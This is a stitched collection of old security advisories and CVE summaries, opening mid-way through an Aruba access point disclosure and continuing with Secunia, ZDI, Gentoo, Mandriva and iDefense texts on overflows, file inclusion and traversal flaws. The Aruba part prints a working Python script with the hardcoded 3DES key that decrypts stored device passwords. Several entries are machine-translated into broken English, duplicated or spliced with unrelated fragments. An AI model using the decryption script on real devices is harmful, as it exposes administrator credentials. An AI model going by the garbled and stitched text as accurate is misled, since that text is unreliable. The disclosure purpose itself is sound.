Discovery Protocol). 0000 02 07 04 00 0b 86 9e 7a 32 04 07 03 00 0b 86 9e .......z2....... 0010 7a 32 06 02 00 78 0a 11 30 30 3a 30 62 3a 38 36 z2...x..00:0b:86 0020 3a XX XX 3a XX XX 3a XX XX 0c 3a 41 72 75 62 61 :XX:XX:XX.:Aruba 0030 4f 53 20 28 4d 4f 44 45 4c 3a 20 52 41 50 2d 31 OS (MODEL: RAP-1 0040 35 35 29 2c 20 56 65 72 73 69 6f 6e 20 36 2e 34 55), Version 6.4 0050 2e 32 2e 36 2d 34 2e 31 2e 31 2e 31 30 20 28 35 .2.6-4.1.1.10 (5 0060 31 38 31 30 29 0e 04 00 0c 00 08 10 0c 05 01 0a 1810)........... 0070 00 00 22 02 00 00 00 0e 00 08 04 65 74 68 30 fe .."........eth0. 0080 06 00 0b 86 01 00 01 fe 09 00 12 0f 03 00 00 00 ................ 0090 00 00 fe 09 00 12 0f 01 03 6c 03 00 10 fe 06 00 .........l...... 00a0 12 0f 04 06 76 00 00 ....v.. The broadcast packet contains the APs MAC address, model number and exact firmware version.This detailed information could aid an attacker to easily find and identify potential targets for known vulnerabilities. ------------------------------------------------------ 26. AP: User passwords are encrypted with a static key ------------------------------------------------------ Based on the vulnerability shown in #24 which potentially discloses the password hashes of AP user accounts, the implemented hashing algorithm was tested. CVE-2014-7299 describes the password hashes as "encrypted password hashes". The following line shows the mgmt-user configuration for the user "admin" with password "admin": mgmt-user admin f9ac59cd431e174fb07539a8a811a1aa Some testing with various passwords and especially password lengths showed that the passwords are actually encrypted and not hashed (as hash algorithms produce the same length output for different length input): f9ac59cd431e174fb07539a8a811a1aa # admin d7a75c655b8e2fb8609d0b04275e02767f2dfae8c63088cf # adminadmin The encryption algorithm used for the above passwords turned out to be 3DES in CBC mode. The encryption algorithm uses a 24 byte static key which is hardcoded on the AP. Sampling of different Firmware versions confirmed that the key is identical for all available versions. The IV required for 3DES consists of 8 random bytes, and is stored as the first 8 byte of the encrypted password. The following Python script can be used to decrypt the above hashes: import pyDes hashes = ( 'f9ac59cd431e174fb07539a8a811a1aa', # admin 'd7a75c655b8e2fb8609d0b04275e02767f2dfae8c63088cf' # adminadmin ) key = ( '\x32\x74\x10\x84\x91\x17\x75\x46\x14\x75\x82\x92' '\x43\x49\x04\x59\x18\x69\x15\x94\x27\x84\x30\x03' ) for h in hashes: d = pyDes.triple_des(key, pyDes.CBC, h.decode('hex')[:8], pad='\00') print h, '=>', d.decrypt(h.decode('hex')[8:]) Mitigation ========== Aruba released three advisories, related to the issues reported here: http://www.arubanetworks.com/assets/alert/ARUBA-PSA-2016-004.txt http://www.arubanetworks.com/assets/alert/ARUBA-PSA-2016-005.txt http://www.arubanetworks.com/assets/alert/ARUBA-PSA-2016-006.txt Following the resolution advises given in those advisories is strongly recommended. These advisories are also available on the Aruba security bulletin: http://www.arubanetworks.com/support-services/security-bulletins/ For the vulnerabilities related to PAPI, Aruba has made the following document available: http://community.arubanetworks.com/aruba/attachments/aruba/aaa-nac-guest-access-byod/25840/1/Control_Plane_Security_Best_Practices_1_0.pdf This doc gives several advises how to remediate the PAPI related vulnerabilities. An update fixing the issues is announced for Q3/2016. For further information there is also a discussion thread in Aruba's Airheads Community Forum: http://community.arubanetworks.com/t5/AAA-NAC-Guest-Access-BYOD/Security-vulnerability-advisories/m-p/266095#M25840 Author ====== The vulnerabilities were discovered by Sven Blumenstein from Google Security Team. Timeline ======== 2016/01/22 - Security report sent to sirt@arubanetworks.com with 90 day disclosure deadline (2016/04/22). 2016/01/22 - Aruba acknowledges report and starts working on the issues. 2016/02/01 - Asking Aruba for ETA on detailed feedback. 2016/02/03 - Detailed feedback for all reported vulnerabilities received. 2016/02/16 - Answered several questions from the feedback, asked Aruba for patch ETA. 2016/02/29 - Pinged for patch ETA. 2016/03/08 - Pinged for patch ETA. 2016/03/12 - Received detailed list with approx. ETA for patch releases and current status. 2016/03/21 - Aruba asks for extension of 90 day disclosure deadline. 2016/03/24 - Asked Aruba for exact patch release dates. 2016/04/02 - Aruba confirmed 4.2.x branch update for 2016/04/15, 4.1.x branch update for 2016/04/30 (past 90 day deadline). 2016/04/14 - 14 day grace period for disclosure was granted, according to the disclosure policy. New disclosure date was set to 2016/05/06. 2016/05/02 - Asking for status of still unreleased 'end of April' update. 2016/05/02 - Aruba confirmed availability of update on 2016/05/09 (after grace period). 2016/05/03 - Aruba released three advisories on http://www.arubanetworks.com/support-services/security-bulletins/ 2016/05/06 - Public disclosure. ---------------------------------------------------------------------- Secunia is proud to announce the availability of the Secunia Software Inspector. The Secunia Software Inspector is a free service that detects insecure versions of software that you may have installed in your system. When insecure versions are detected, the Secunia Software Inspector also provides thorough guidelines for updating the software to the latest secure version from the vendor. 1) A boundary error within the management interface can be exploited to cause a heap-based buffer overflow by sending overly long strings as credentials. 2) An error in the guest account authentication process within the Captive Portal can be exploited to e.g. gain access to administrative sections without specifying a password. https://support.arubanetworks.com PROVIDED AND/OR DISCOVERED BY: John Munther and Maxim Salomon, n.runs AG ORIGINAL ADVISORY: http://lists.grok.org.uk/pipermail/full-disclosure/2007-February/052382.html http://lists.grok.org.uk/pipermail/full-disclosure/2007-February/052380.html ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Multiple PHP remote file inclusion vulnerabilities in TagIt! Tagboard 2.1.B Build 2 and earlier, when register_globals is enabled, allow remote attackers to execute arbitrary PHP code via a URL in the (1) configpath parameter to (a) tagviewer.php, (b) tag_process.php, and (c) CONFIG/errmsg.inc.php; and (d) addTagmin.php, (e) ban_watch.php, (f) delTagmin.php, (g) delTag.php, (h) editTagmin.php, (i) editTag.php, (j) manageTagmins.php, and (k) verify.php in tagmin/; the (2) adminpath parameter to (l) tagviewer.php, (m) tag_process.php, and (n) tagmin/index.php; and the (3) admin parameter to (o) readconf.php, (p) updateconf.php, (q) updatefilter.php, and (r) wordfilter.php in tagmin/; different vectors than CVE-2006-5249. TagIt! Tagboard Is register_globals When is enabled, PHP A remote file inclusion vulnerability exists. This vulnerability CVE-2006-5249 Is a different vulnerability.By a third party, within the following parameters URL Through any PHP The code may be executed. TagIt! Tagboard 2.1.B Build 2 and earlier versions have vulnerabilities. TagIt! TagBoard is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible

Directory traversal vulnerability in Nickolas Grigoriadis Mini Web server (MiniWebsvr) 0.0.6 allows remote attackers to list the directory immediately above the web root via a ..%00 sequence in the URI. Miniwebsvr is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this vulnerability to retrieve arbitrary files from the vulnerable system in the context of the affected application. Information obtained may aid in further attacks. Note that the attacker can traverse to only one directory above the current working directory of the webserver application. Version 0.0.6 is vulnerable to this issue; other versions may also be affected

Stack-based buffer overflow in magentproc.exe for Hewlett-Packard Mercury LoadRunner Agent 8.0 and 8.1, Performance Center Agent 8.0 and 8.1, and Monitor over Firewall 8.1 allows remote attackers to execute arbitrary code via a packet with a long server_ip_name field to TCP port 54345, which triggers the overflow in mchan.dll. Authentication is not required to exploit this vulnerability.The specific flaw exists within the process magentproc.exe that binds to TCP port 54345. When parsing packets containing an overly long 'server_ip_name' field, an exploitable stack overflow may be triggered due to an an inline strcpy() within the library mchan.dll. Multiple Mercury products are prone to a stack-based buffer-overflow vulnerability because the applications fail to bounds-check user-supplied data before copying it into an insufficiently sized buffer. Failed exploit attempts will result in a denial of service. HP Mercury is an IT management software developed by Mercury acquired by HP. Authentication is not required to exploit this vulnerability. -- Vendor Response: Hewlett-Packard has issued an update to correct this vulnerability. More details can be found at: http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c00854250 -- Disclosure Timeline: 2006.10.27 - Vulnerability reported to vendor 2006.11.10 - Digital Vaccine released to TippingPoint customers 2007.02.08 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by Eric DETOISIEN. -- About the Zero Day Initiative (ZDI): Established by TippingPoint, a division of 3Com, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. 3Com does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, 3Com provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, 3Com provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. ---------------------------------------------------------------------- Secunia is proud to announce the availability of the Secunia Software Inspector. The Secunia Software Inspector is a free service that detects insecure versions of software that you may have installed in your system. When insecure versions are detected, the Secunia Software Inspector also provides thorough guidelines for updating the software to the latest secure version from the vendor. Try it out online: http://secunia.com/software_inspector/ ---------------------------------------------------------------------- TITLE: HP Mercury Products Long "server_ip_name" Buffer Overflow SECUNIA ADVISORY ID: SA24112 VERIFY ADVISORY: http://secunia.com/advisories/24112/ CRITICAL: Moderately critical IMPACT: System access WHERE: >From local network SOFTWARE: Mercury LoadRunner Agent 8.x http://secunia.com/product/13450/ Mercury Monitor over Firewall 8.x http://secunia.com/product/13449/ Mercury Performance Center Agent 8.x http://secunia.com/product/13448/ DESCRIPTION: A vulnerability has been reported in various HP Mercury products, which can be exploited by malicious people to compromise a vulnerable system. The vulnerability is caused due to a boundary error within MCHAN.DLL when parsing packets sent to MAGENTPROC.EXE on port 54345/TCP. -- Mercury LoadRunner Agent 8.1 FP4 -- NT: http://webnotes.merc-int.com/patches.nsf/c4d68388a23535dc422567d0004bbae2/c337892f322b2311 c22572670060b795?OpenDocument AIX, HP, Solaris, Linux: http://webnotes.merc-int.com/patches.nsf/c4d68388a23535dc422567d0004bbae2/6d7ce88c0d5c4b36 c225726a004a94a2?OpenDocument -- Mercury LoadRunner Agent 8.1 SP1, FP1, FP2, FP3 -- Update to 8.1 FP4 and apply patches listed above. -- Mercury LoadRunner Agent 8.1 GA -- NT: http://webnotes.merc-int.com/patches.nsf/c4d68388a23535dc422567d0004bbae2/7cd789640e496c34 c225726700613486?OpenDocument AIX, HP, Solaris, Linux: http://webnotes.merc-int.com/patches.nsf/c4d68388a23535dc422567d0004bbae2/f2de896609dd7efb c225726a004af033?OpenDocument -- Mercury LoadRunner Agent 8.0 GA -- NT: http://webnotes.merc-int.com/patches.nsf/c4d68388a23535dc422567d0004bbae2/fa4a48afea2f8198 c22572670061bbe7?OpenDocument AIX, HP, Solaris, Linux: http://webnotes.merc-int.com/patches.nsf/c4d68388a23535dc422567d0004bbae2/5de153e30789fa4a c225726a004b2354?OpenDocument -- Mercury Performance Center Agent 8.1 FP4 -- NT: http://webnotes.merc-int.com/patches.nsf/c4d68388a23535dc422567d0004bbae2/ae5d9a48a163fbb4 c225726a004c7831?OpenDocument AIX, HP, Solaris, Linux: http://webnotes.merc-int.com/patches.nsf/c4d68388a23535dc422567d0004bbae2/34e894d8d8a1b941 c225726a004ff335?OpenDocument -- Mercury Performance Center Agent 8.1 FP1, FP2, FP3 -- Update to version 8.1 FP4 and apply patches listed above. -- Mercury Performance Center Agent 8.1 GA -- NT: http://webnotes.merc-int.com/patches.nsf/c4d68388a23535dc422567d0004bbae2/0831f8b0bd9d9619 c225726a004cf7fe?OpenDocument AIX, HP, Solaris, Linux: http://webnotes.merc-int.com/patches.nsf/c4d68388a23535dc422567d0004bbae2/a7333913152e65e1 c225726a005035e4?OpenDocument -- Mercury Performance Center Agent 8.0 GA -- Update to version 8.1 GA and apply patches listed above. -- Mercury Monitor over Firewall 8.1 -- NT: http://webnotes.merc-int.com/patches.nsf/c4d68388a23535dc422567d0004bbae2/c9b9924b3206614f c225726a004ded7d?OpenDocument PROVIDED AND/OR DISCOVERED BY: Discovered by Eric Detoisien and reported via ZDI. ORIGINAL ADVISORY: HPSBGN02187 SSRT061280: http://www5.itrc.hp.com/service/cki/docDisplay.do?docId=c00854250 ZDI: http://www.zerodayinitiative.com/advisories/ZDI-07-007.html ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

cmdmon.sys in Comodo Firewall Pro (formerly Comodo Personal Firewall) 2.4.16.174 and earlier does not validate arguments that originate in user mode for the (1) NtCreateSection, (2) NtOpenProcess, (3) NtOpenSection, (4) NtOpenThread, and (5) NtSetValueKey hooked SSDT functions, which allows local users to cause a denial of service (system crash) and possibly gain privileges via invalid arguments. Comodo Firewall Pro is prone to a denial-of-service vulnerability. Local attackers may exploit this vulnerability to cause denial of service. The Comodo firewall hooks many functions in SSDT, and there are at least 7 cases where there are no parameters for verifying user mode. Due to a bug in the cmdmon.sys driver, a denial of service may result when calling NtConnectPort, NtCreatePort, NtCreateSection, NtOpenProcess, NtOpenSection, NtOpenThread, and NtSetValueKey

The Intel 2200BG 802.11 Wireless Mini-PCI driver 9.0.3.9 (w29n51.sys) allows remote attackers to cause a denial of service (system crash) via crafted disassociation packets, which triggers memory corruption of "internal kernel structures," a different vulnerability than CVE-2006-6651. NOTE: this issue might overlap CVE-2006-3992. Intel 2200BG 802.11 Wireless Mini-PCI driver (w29n51.sys) There is a service disruption ( System crash ) There is a vulnerability that becomes a condition. This vulnerability CVE-2006-6651 Is a different vulnerability

Ipswitch WS_FTP Server 5.04 allows FTP site administrators to execute arbitrary code on the system via a long input string to the (1) iFTPAddU or (2) iFTPAddH file, or to a (3) edition module

cmdmon.sys in Comodo Firewall Pro (formerly Comodo Personal Firewall) before 2.4.16.174 does not validate arguments that originate in user mode for the (1) NtConnectPort and (2) NtCreatePort hooked SSDT functions, which allows local users to cause a denial of service (system crash) and possibly gain privileges via invalid arguments. Comodo Firewall is prone to multiple denial-of-service vulnerabilities because it fails to adequately validate user supplied data. Exploiting these issues may permit attackers to cause system crashes and deny service to legitimate users. Presumaby, attackers may also be able to execute arbitrary code, but this has not been confirmed. Comodo Firewall Pro 2.4.16.174 and Comodo Personal Firewall 2.3.6.81 are vulnerable; other versions may also be affected. The Comodo firewall hooks many functions in SSDT, and there are at least 7 cases where there are no parameters for verifying user mode. Due to a bug in the cmdmon.sys driver, a denial of service may result when calling NtConnectPort, NtCreatePort, NtCreateSection, NtOpenProcess, NtOpenSection, NtOpenThread, and NtSetValueKey

Cisco IOS after 12.3(14)T, 12.3(8)YC1, 12.3(8)YG, and 12.4, with voice support and without Session Initiated Protocol (SIP) configured, allows remote attackers to cause a denial of service (crash) by sending a crafted packet to port 5060/UDP. Exploitation of this vulnerability may result in a denial-of-service condition. According to Cisco Systems' information, it is not necessary for the specific affected version. SIP port (5060/TCP,UDP) Is reported to be open by default.Crafted by a third party SIP By processing the packet, SIP Service works Cisco IOS Device is out of service (DoS) It may be in a state. This issue affects only devices that support voice communications but don't have SIP enabled. Attackers can exploit this issue to reload a vulnerable device. IOS releases subsequent to 12.3(14)T, 12.3(8)YC1, and 12.3(8)YG are vulnerable. All 12.4 releases are affected as well. In addition, some IOS versions that support SIP services may process SIP messages even if no SIP operations are configured. If you want to process SIP messages, IOS needs to open UDP port 5060 and TCP port 5060 for listening. Devices not listening on TCP 5060 or UDP 5060 are not affected by the vulnerability. Since SIP uses UDP for transport, it is possible to spoof the IP address of the sender, which can invalidate ACLs that allow traffic from trusted IP addresses to those ports

Intel Enterprise Southbridge 2 Baseboard Management Controller (BMC), Intel Server Boards 5000XAL, S5000PAL, S5000PSL, S5000XVN, S5000VCL, S5000VSA, SC5400RA, and OEM Firmware for Intel Enterprise Southbridge Baseboard Management Controller before 20070119, when Intelligent Platform Management Interface (IPMI) is enabled, allow remote attackers to connect and issue arbitrary IPMI commands, possibly triggering a denial of service. By issuing commands to this interface, attackers can trigger denial-of-service conditions, but they cannot gain access to the operating system or data contained in affected computers. Firmware versions prior to release 57 are vulnerable to this issue. Intel Southbridge 2 is the Southbridge used on many Intel server motherboards. But successful exploitation of this vulnerability can only result in a denial of service

Format string vulnerability in Help Viewer 3.0.0 allows remote user-assisted attackers to cause a denial of service (crash) via format string specifiers in a filename, which is not properly handled when calling the NSBeginAlertSheet Apple AppKit function. Multiple products for Mac OS X are prone to multiple remote format-string vulnerabilities. The affected applications include Help Viewer, Safari, iPhoto, and iMovie. Exploiting these issues can allow attacker-supplied data to be written to arbitrary memory locations, which can facilitate the execution of arbitrary machine code with the privileges of a targeted application. Failed exploit attempts will likely crash the application. Help Viewer 3.0.0, Safari 2.0.4, iMovie HD 6.0.3, and iPhoto 6.0.5 are reported affected; other versions may be vulnerable as well. A format string vulnerability exists in MyBB (aka MyBulletinBoard) version 1.2.2

Format string vulnerability in iPhoto 6.0.5 allows remote user-assisted attackers to cause a denial of service (crash) via format string specifiers in a filename, which is not properly handled when calling certain Apple AppKit functions. Multiple products for Mac OS X are prone to multiple remote format-string vulnerabilities. The affected applications include Help Viewer, Safari, iPhoto, and iMovie. Exploiting these issues can allow attacker-supplied data to be written to arbitrary memory locations, which can facilitate the execution of arbitrary machine code with the privileges of a targeted application. Failed exploit attempts will likely crash the application. Help Viewer 3.0.0, Safari 2.0.4, iMovie HD 6.0.3, and iPhoto 6.0.5 are reported affected; other versions may be vulnerable as well. A format string vulnerability exists in iPhoto version 6.0.5

Format string vulnerability in Apple Safari 2.0.4 (419.3) allows remote user-assisted attackers to cause a denial of service (crash) via format string specifiers in filenames that are not properly handled when calling the (1) NSLog and (2) NSBeginAlertSheet Apple AppKit functions. Multiple products for Mac OS X are prone to multiple remote format-string vulnerabilities. The affected applications include Help Viewer, Safari, iPhoto, and iMovie. Exploiting these issues can allow attacker-supplied data to be written to arbitrary memory locations, which can facilitate the execution of arbitrary machine code with the privileges of a targeted application. Failed exploit attempts will likely crash the application. Help Viewer 3.0.0, Safari 2.0.4, iMovie HD 6.0.3, and iPhoto 6.0.5 are reported affected; other versions may be vulnerable as well

Integer overflow in the FontFileInitTable function in X.Org libXfont before 20070403 allows remote authenticated users to execute arbitrary code via a long first line in the fonts.dir file, which results in a heap overflow. X.Org and XFree86 of libXfont Used in FontFileInitTable() Functions include fonts.dir An integer overflow vulnerability exists when an excessively long string is specified on the first line of a file.X Denial of service caused by a crash caused by a malicious user who can connect to the server (DoS) State, or X Server execution authority (root) May execute arbitrary code. The 'libXfont' library is prone to multiple local integer-overflow vulnerabilities because it fails to adequately bounds-check user-supplied data. An attacker can exploit these vulnerabilities to execute arbitrary code with superuser privileges. Failed exploit attempts will likely cause denial-of-service conditions. These issues affect libXfont 1.2.2; other versions may also be vulnerable. X.Org is an official reference implementation of the X Window System operated by the X.Org Foundation. X.Org's LibXFont library has an integer overflow when parsing BDF fonts, allowing attackers to cause heap overflow through specially crafted BDF fonts. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200705-10 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: LibXfont, TightVNC: Multiple vulnerabilities Date: May 08, 2007 Bugs: #172575, #174200 ID: 200705-10 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities have been reported in libXfont and TightVNC, allowing for the execution of arbitrary code with root privileges. Background ========== LibXfont is the X.Org font library. TightVNC is a VNC client/server for X displays. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 net-misc/tightvnc < 1.2.9-r4 >= 1.2.9-r4 2 x11-libs/libXfont < 1.2.7-r1 >= 1.2.7-r1 ------------------------------------------------------------------- 2 affected packages on all of their supported architectures. ------------------------------------------------------------------- Description =========== The libXfont code is prone to several integer overflows, in functions ProcXCMiscGetXIDList(), bdfReadCharacters() and FontFileInitTable(). TightVNC contains a local copy of this code and is also affected. Impact ====== A local attacker could use a specially crafted BDF Font to gain root privileges on the vulnerable host. Resolution ========== All libXfont users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=x11-libs/libXfont-1.2.7-r1" All TightVNC users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-misc/tightvnc-1.2.9-r4" References ========== [ 1 ] CVE-2007-1003 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1003 [ 2 ] CVE-2007-1351 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1351 [ 3 ] CVE-2007-1352 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1352 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200705-10.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDKSA-2007:080-1 http://www.mandriva.com/security/ _______________________________________________________________________ Package : tightvnc Date : April 10, 2007 Affected: 2007.1 _______________________________________________________________________ Problem Description: Local exploitation of a memory corruption vulnerability in the X.Org and XFree86 X server could allow an attacker to execute arbitrary code with privileges of the X server, typically root. The vulnerability exists in the ProcXCMiscGetXIDList() function in the XC-MISC extension. This request is used to determine what resource IDs are available for use. This function contains two vulnerabilities, both result in memory corruption of either the stack or heap. The ALLOCATE_LOCAL() macro used by this function allocates memory on the stack using alloca() on systems where alloca() is present, or using the heap otherwise. The handler function takes a user provided value, multiplies it, and then passes it to the above macro. This results in both an integer overflow vulnerability, and an alloca() stack pointer shifting vulnerability. (CVE-2007-1003) iDefense reported two integer overflows in the way X.org handled various font files. (CVE-2007-1351, CVE-2007-1352) TightVNC uses some of the same code base as Xorg, and has the same vulnerable code. Updated packages are patched to address these issues. Update: Packages for Mandriva Linux 2007.1 are now available. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1003 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1351 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1352 _______________________________________________________________________ Updated Packages: Mandriva Linux 2007.1: 9c14a56106984cd16780a1fd7e9c7beb 2007.1/i586/tightvnc-1.2.9-16.1mdv2007.1.i586.rpm 8aa3673bc8843dae12d9f18c4226214e 2007.1/i586/tightvnc-doc-1.2.9-16.1mdv2007.1.i586.rpm d78d10a879bc1b1c461f75b815dcd656 2007.1/i586/tightvnc-server-1.2.9-16.1mdv2007.1.i586.rpm 59e94b523bc078f3997f689dae0e22b5 2007.1/SRPMS/tightvnc-1.2.9-16.1mdv2007.1.src.rpm Mandriva Linux 2007.1/X86_64: 26e585c8ba950720c17ea4ce1373c05c 2007.1/x86_64/tightvnc-1.2.9-16.1mdv2007.1.x86_64.rpm 6f031ef92c5bec87488bba5861f0d41e 2007.1/x86_64/tightvnc-doc-1.2.9-16.1mdv2007.1.x86_64.rpm 205e13d0c46dc25bfa39c7dcfafe6dcb 2007.1/x86_64/tightvnc-server-1.2.9-16.1mdv2007.1.x86_64.rpm 59e94b523bc078f3997f689dae0e22b5 2007.1/SRPMS/tightvnc-1.2.9-16.1mdv2007.1.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team <security*mandriva.com> -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.7 (GNU/Linux) iD8DBQFGG+ypmqjQ0CJFipgRAkVGAKDU/Gvf1lxdrBW8R+e80BqmE4fIBQCgnQQ6 nGHrE1CatxZlZ3wasfF2stA= =vO/P -----END PGP SIGNATURE----- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ . (CVE-2007-1351, CVE-2007-1352) Multiple integer overflows in (1) the XGetPixel function in ImUtil.c in x.org libx11 before 1.0.3, and (2) XInitImage function in xwd.c for ImageMagick, allow user-assisted remote attackers to cause a denial of service (crash) or information leak via crafted images with large or negative values that trigger a buffer overflow. ---------------------------------------------------------------------- Secunia is proud to announce the availability of the Secunia Software Inspector. The Secunia Software Inspector is a free service that detects insecure versions of software that you may have installed in your system. When insecure versions are detected, the Secunia Software Inspector also provides thorough guidelines for updating the software to the latest secure version from the vendor. Try it out online: http://secunia.com/software_inspector/ ---------------------------------------------------------------------- TITLE: Linux-PAM Login Bypass Security Vulnerability SECUNIA ADVISORY ID: SA23858 VERIFY ADVISORY: http://secunia.com/advisories/23858/ CRITICAL: Moderately critical IMPACT: Security Bypass WHERE: >From remote SOFTWARE: Linux-PAM 0.x http://secunia.com/product/1701/ DESCRIPTION: A vulnerability has been reported in Linux-PAM, which can be exploited by malicious people to bypass certain security restrictions. This can be exploited to login with any given password if the hash in the passwd file is "!!" or similar. SOLUTION: Update to version 0.99.7.1. PROVIDED AND/OR DISCOVERED BY: Bernardo Innocenti ORIGINAL ADVISORY: https://www.redhat.com/archives/pam-list/2007-January/msg00017.html http://www.redhat.com/archives/fedora-devel-list/2007-January/msg01277.html ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . Multiple Vendor X Server fonts.dir File Parsing Integer Overflow Vulnerability iDefense Security Advisory 04.03.07 http://labs.idefense.com/intelligence/vulnerabilities/ Apr 03, 2007 I. BACKGROUND The X Window System (or X11) is a graphical windowing system used on Unix-like systems. It is based on a client/server model. More information about about The X Window system is available at the following URL. http://en.wikipedia.org/wiki/X_Window_System II. DESCRIPTION Local exploitation of an integer overflow vulnerability in multiple vendors' implementations of the X Window System font information file parsing component could allow execution of arbitrary commands with elevated privileges. The vulnerability specifically exists in the parsing of the "fonts.dir" font information file. When the element count on the first line of the file specifies it contains more than 1,073,741,824 (2 to the power of 30) elements, a potentially exploitable heap overflow condition occurs. III. As the X11 server requires direct access to video hardware, it runs with elevated privileges. A user compromising an X server would gain those permissions. In order to exploit this vulnerability, an attacker would need to be able to cause the X server to use a maliciously constructed font. The X11 server contains multiple methods for a user to define additional paths to look for fonts. An exploit has been developed using the "-fp" command line option to the X11 server to pass the location of the attack to the server. It is also possible to use "xset" command with the "fp" option to perform an attack on an already running server. Some distributions allow users to start the X11 server only if they are logged on at the console, while others will allow any user to start it. Attempts at exploiting this vulnerability may put the console into an unusable state. This will not prevent repeated exploitation attempts. IV. DETECTION iDefense has confirmed the existence of this vulnerability in X.Org X11R7.1. V. WORKAROUND iDefense is currently unaware of any effective workaround for this issue. VI. VENDOR RESPONSE The X.Org Foundation has addressed this vulnerability with source code patches. More information can be found from their advisory at the following URL. http://lists.freedesktop.org/archives/xorg-announce/2007-april/0286.html VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2007-1352 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 02/21/2007 Initial vendor notification 02/21/2007 Initial vendor response 04/03/2007 Coordinated public disclosure IX. CREDIT This vulnerability was discovered by Greg MacManus of iDefense Labs. Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright \xa9 2007 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerservice@idefense.com for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss 